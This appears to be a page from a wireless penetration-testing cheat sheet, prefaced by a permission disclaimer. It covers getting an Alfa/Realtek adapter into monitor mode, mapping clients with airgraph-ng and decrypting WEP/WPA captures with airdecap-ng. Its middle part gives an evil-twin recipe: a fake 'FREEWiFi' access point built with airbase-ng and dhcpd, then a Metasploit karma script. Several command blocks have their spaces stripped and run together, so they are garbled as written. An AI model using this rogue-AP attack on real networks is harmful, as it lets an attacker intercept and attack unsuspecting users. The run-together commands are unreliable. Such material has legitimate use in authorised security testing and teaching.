Always ensure you have explicit permission to access any computer system before using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here.
Choosing a wireless module
You must choose a wireless module that has a chipset that is capable of being put in monitor mode. The site below has a fairly comprehensive list of adapters that support this.
Install the correct driver with apt-get install realtek-rtl88xxau-dkms. After a reboot the WiFi adapter worked on my installation. The only thing to note - it may not work in the usual way with airmon-ng to capture handshakes. The following commands can be used to troubleshoot the interface:
sudo ifconfig wlan0 down
sudo airmon-ng check kill
sudo iwconfig wlan0 mode monitor
sudo ifconfig wlan0 up
After a lot of failed attempts I found a working solution for folks that have continued problems with getting the Alfa card to work. First unplug your Wi-Fi adapter, then follow these steps:
aptremoverealtek-rtl88xxau-dkms&&aptpurgerealtek-rtl88xxau-dkmsaptupdate&&aptupgradeaptautoremove&&aptautoclean# rebootapt-getdist-upgrade# rebootgitclonehttps://github.com/aircrack-ng/rtl8812aucdrtl8812aumake&&makeinstall# power off the PC
Now turn ON the PC and plug your Wi-Fi adapter and it should work normally.
airbase-ng-c $channel -P-C60-e“FREEWiFi”-vwlan0mon#"FREE WiFi" is the name of your evil APifconfigat0up10.0.0.1/24mkdir-p/var/run/dhcpdchown-Rdhcpd:dhcpd/var/run/dhcpdtouch/var/lib/dhcp3/dhcpd.leasescatdhcpd.conftouch/tmp/dhcp.logchowndhcpd:dhcpd/tmp/dhcp.logdhcpd3-f-cf/tmp/dhcpd.conf-pf/var/run/dhcpd/pid-lf/tmp/dhcp.logat0msfconsole-r/root/karma.rc
# $infile should be a .csv from aerodump-ng, $outfile should be a .pngairgraph-ng-i $infile.csv-o $outfile.png-gCAPReog $outfile.pngairgraph-ng-i $infile.csv-o $outfile.png-gCPGeog $outfile.png
CAPR: Client to AP Relationship. This shows all the clients attached to a particular AP.
CPG: Common Probe Graph. This will show all probed SSID by clients.
With airdecap-ng you can decrypt WEP/WPA/WPA2 capture files. As well, it can also be used to strip the wireless headers from an unencrypted wireless capture.
It outputs a new file ending with “-dec.cap” which is the decrypted/stripped version of the input file.
Remove the wireless headers from an open network (no encryption) capture:
airdecap-ng-b $AP_MAC $capfile
Decrypt a WEP-encrypted capture using a hexadecimal WEP key:
airdecap-ng-w $WEP_KEY $WEP_capfile
Decrypt a WPA/WPA2 encrypted capture using the passphrase:
airdecap-ng-e $ESSID -p $WPA_PASS $WPA_capfile
WPA/WPA2 Requirements
The capture file must contain a valid four-way handshake. For this purpose having (packets 2 and 3) or (packets 3 and 4) will work correctly. In fact, you don't truly need all four handshake packets.
As well, only data packets following the handshake will be decrypted. This is because information is required from the handshake in order to decrypt the data packets.